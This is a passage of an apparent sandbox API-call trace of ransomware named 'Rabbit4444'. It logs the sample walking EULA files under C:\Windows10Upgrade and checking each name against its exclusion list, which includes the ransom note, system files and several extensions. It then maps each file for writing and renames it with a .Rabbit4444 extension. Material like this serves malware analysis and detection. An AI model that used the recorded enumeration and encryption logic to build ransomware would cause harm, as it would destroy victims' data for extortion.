(lpString1="EULA_lt-lt.htm", lpString2="boot") returned 1 [0047.519] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="ids.txt") returned -1 [0047.519] lstrcmpiW (lpString1="EULA_lt-lt.htm", lpString2="NTUSER.DAT") returned -1 [0047.519] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_lt-lt.htm" | out: lpString1="EULA_lt-lt.htm") returned="EULA_lt-lt.htm" [0047.519] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm", dwFileAttributes=0x0) returned 1 [0047.519] lstrlenW (lpString="EULA_lt-lt.htm") returned 14 [0047.519] lstrlenW (lpString="Rabbit4444") returned 10 [0047.519] lstrcmpiW (lpString1="_lt-lt.htm", lpString2="Rabbit4444") returned -1 [0047.519] lstrlenW (lpString=".dll") returned 4 [0047.519] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.520] lstrlenW (lpString=".lnk") returned 4 [0047.520] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.520] lstrlenW (lpString=".ini") returned 4 [0047.520] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.520] lstrlenW (lpString=".sys") returned 4 [0047.520] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.520] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lt-lt.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.520] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.520] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13883058967) returned 1 [0047.520] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=76091) returned 1 [0047.520] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0047.520] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0047.520] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12c40, lpName=0x0) returned 0x298 [0047.521] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12c40) returned 0x70000 [0047.525] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.525] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0047.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.525] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0047.525] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0047.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0047.526] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13883632761) returned 1 [0047.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0047.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0047.526] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.526] CloseHandle (hObject=0x298) returned 1 [0047.527] CloseHandle (hObject=0x278) returned 1 [0047.529] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm.Rabbit4444") returned 63 [0047.529] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lt-lt.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lt-lt.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lt-lt.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.530] InterlockedExchangeAdd (in: Addend=0xff618, Value=76096 | out: Addend=0xff618) returned 12838640 [0047.530] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3165 [0047.530] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3f5af3, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3f5af3, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x147c5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_lv-lv.htm", cAlternateFileName="EULA_L~2.HTM")) returned 1 [0047.530] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.530] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.530] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="Rabbit4444.exe") returned -1 [0047.530] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2=".") returned 1 [0047.530] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="..") returned 1 [0047.530] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="windows") returned -1 [0047.530] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="bootmgr") returned 1 [0047.530] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="pagefile.sys") returned -1 [0047.530] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="boot") returned 1 [0047.530] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="ids.txt") returned -1 [0047.530] lstrcmpiW (lpString1="EULA_lv-lv.htm", lpString2="NTUSER.DAT") returned -1 [0047.530] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_lv-lv.htm" | out: lpString1="EULA_lv-lv.htm") returned="EULA_lv-lv.htm" [0047.530] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm", dwFileAttributes=0x0) returned 1 [0047.531] lstrlenW (lpString="EULA_lv-lv.htm") returned 14 [0047.531] lstrlenW (lpString="Rabbit4444") returned 10 [0047.531] lstrcmpiW (lpString1="_lv-lv.htm", lpString2="Rabbit4444") returned -1 [0047.531] lstrlenW (lpString=".dll") returned 4 [0047.531] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.531] lstrlenW (lpString=".lnk") returned 4 [0047.531] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.531] lstrlenW (lpString=".ini") returned 4 [0047.531] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.531] lstrlenW (lpString=".sys") returned 4 [0047.531] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.531] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lv-lv.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.531] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.531] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13884185253) returned 1 [0047.531] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=83909) returned 1 [0047.531] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0047.531] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0047.531] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14ad0, lpName=0x0) returned 0x298 [0047.532] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14ad0) returned 0x70000 [0047.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0047.536] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0047.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0047.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0047.537] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13884743666) returned 1 [0047.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0047.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0047.537] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.538] CloseHandle (hObject=0x298) returned 1 [0047.538] CloseHandle (hObject=0x278) returned 1 [0047.540] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm.Rabbit4444") returned 63 [0047.540] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lv-lv.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_lv-lv.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_lv-lv.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.541] InterlockedExchangeAdd (in: Addend=0xff618, Value=83920 | out: Addend=0xff618) returned 12914736 [0047.541] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3170 [0047.541] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3fa921, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3fa921, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x10674, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_nb-no.htm", cAlternateFileName="EULA_N~1.HTM")) returned 1 [0047.541] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.541] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.541] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="Rabbit4444.exe") returned -1 [0047.541] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2=".") returned 1 [0047.541] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="..") returned 1 [0047.541] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="windows") returned -1 [0047.541] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="bootmgr") returned 1 [0047.541] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="pagefile.sys") returned -1 [0047.541] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="boot") returned 1 [0047.541] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="ids.txt") returned -1 [0047.541] lstrcmpiW (lpString1="EULA_nb-no.htm", lpString2="NTUSER.DAT") returned -1 [0047.542] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_nb-no.htm" | out: lpString1="EULA_nb-no.htm") returned="EULA_nb-no.htm" [0047.542] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm", dwFileAttributes=0x0) returned 1 [0047.542] lstrlenW (lpString="EULA_nb-no.htm") returned 14 [0047.542] lstrlenW (lpString="Rabbit4444") returned 10 [0047.542] lstrcmpiW (lpString1="_nb-no.htm", lpString2="Rabbit4444") returned -1 [0047.542] lstrlenW (lpString=".dll") returned 4 [0047.542] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.542] lstrlenW (lpString=".lnk") returned 4 [0047.542] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.542] lstrlenW (lpString=".ini") returned 4 [0047.542] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.542] lstrlenW (lpString=".sys") returned 4 [0047.542] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.542] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nb-no.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.543] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.543] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13885335252) returned 1 [0047.543] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=67188) returned 1 [0047.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0047.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0047.543] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10980, lpName=0x0) returned 0x298 [0047.546] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10980) returned 0x70000 [0047.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0047.550] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0047.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.550] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0047.550] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.550] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0047.550] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13886098973) returned 1 [0047.550] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0047.550] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0047.550] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.551] CloseHandle (hObject=0x298) returned 1 [0047.551] CloseHandle (hObject=0x278) returned 1 [0047.553] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm.Rabbit4444") returned 63 [0047.553] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nb-no.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nb-no.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nb-no.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.554] InterlockedExchangeAdd (in: Addend=0xff618, Value=67200 | out: Addend=0xff618) returned 12998656 [0047.554] InterlockedExchangeAdd (in: Addend=0xff624, Value=7 | out: Addend=0xff624) returned 3175 [0047.554] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3fe3b1, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3fe3b1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x10698, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_nl-nl.htm", cAlternateFileName="EULA_N~2.HTM")) returned 1 [0047.554] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.554] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.554] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="Rabbit4444.exe") returned -1 [0047.554] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2=".") returned 1 [0047.554] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="..") returned 1 [0047.554] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="windows") returned -1 [0047.554] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="bootmgr") returned 1 [0047.554] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="pagefile.sys") returned -1 [0047.554] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="boot") returned 1 [0047.554] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="ids.txt") returned -1 [0047.554] lstrcmpiW (lpString1="EULA_nl-nl.htm", lpString2="NTUSER.DAT") returned -1 [0047.554] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_nl-nl.htm" | out: lpString1="EULA_nl-nl.htm") returned="EULA_nl-nl.htm" [0047.554] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm", dwFileAttributes=0x0) returned 1 [0047.555] lstrlenW (lpString="EULA_nl-nl.htm") returned 14 [0047.555] lstrlenW (lpString="Rabbit4444") returned 10 [0047.555] lstrcmpiW (lpString1="_nl-nl.htm", lpString2="Rabbit4444") returned -1 [0047.555] lstrlenW (lpString=".dll") returned 4 [0047.556] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.556] lstrlenW (lpString=".lnk") returned 4 [0047.556] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.556] lstrlenW (lpString=".ini") returned 4 [0047.556] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.556] lstrlenW (lpString=".sys") returned 4 [0047.556] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.556] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nl-nl.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.556] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.556] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13886661400) returned 1 [0047.556] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=67224) returned 1 [0047.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0047.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0047.556] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x109a0, lpName=0x0) returned 0x298 [0047.557] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x109a0) returned 0x70000 [0047.560] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.560] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0047.560] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.560] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0047.560] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.560] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0047.560] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.561] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0047.561] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13887131090) returned 1 [0047.561] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0047.561] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0047.561] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.561] CloseHandle (hObject=0x298) returned 1 [0047.561] CloseHandle (hObject=0x278) returned 1 [0047.564] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm.Rabbit4444") returned 63 [0047.564] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nl-nl.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_nl-nl.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_nl-nl.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.564] InterlockedExchangeAdd (in: Addend=0xff618, Value=67232 | out: Addend=0xff618) returned 13065856 [0047.564] InterlockedExchangeAdd (in: Addend=0xff624, Value=4 | out: Addend=0xff624) returned 3182 [0047.565] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3ff747, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3ff747, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x13f94, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_pl-pl.htm", cAlternateFileName="EULA_P~1.HTM")) returned 1 [0047.565] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.565] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.565] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="Rabbit4444.exe") returned -1 [0047.565] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2=".") returned 1 [0047.565] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="..") returned 1 [0047.565] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="windows") returned -1 [0047.565] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="bootmgr") returned 1 [0047.565] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="pagefile.sys") returned -1 [0047.565] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="boot") returned 1 [0047.565] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="ids.txt") returned -1 [0047.565] lstrcmpiW (lpString1="EULA_pl-pl.htm", lpString2="NTUSER.DAT") returned -1 [0047.565] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_pl-pl.htm" | out: lpString1="EULA_pl-pl.htm") returned="EULA_pl-pl.htm" [0047.565] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm", dwFileAttributes=0x0) returned 1 [0047.565] lstrlenW (lpString="EULA_pl-pl.htm") returned 14 [0047.565] lstrlenW (lpString="Rabbit4444") returned 10 [0047.565] lstrcmpiW (lpString1="_pl-pl.htm", lpString2="Rabbit4444") returned -1 [0047.565] lstrlenW (lpString=".dll") returned 4 [0047.565] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.565] lstrlenW (lpString=".lnk") returned 4 [0047.565] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.565] lstrlenW (lpString=".ini") returned 4 [0047.565] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.566] lstrlenW (lpString=".sys") returned 4 [0047.566] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.566] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_pl-pl.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_pl-pl.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.566] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.566] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13887648360) returned 1 [0047.566] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=81812) returned 1 [0047.566] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0047.566] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0047.566] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x142a0, lpName=0x0) returned 0x298 [0047.567] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x142a0) returned 0x70000 [0047.571] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.571] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0047.571] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.571] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0047.571] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.571] HeapFree (in: 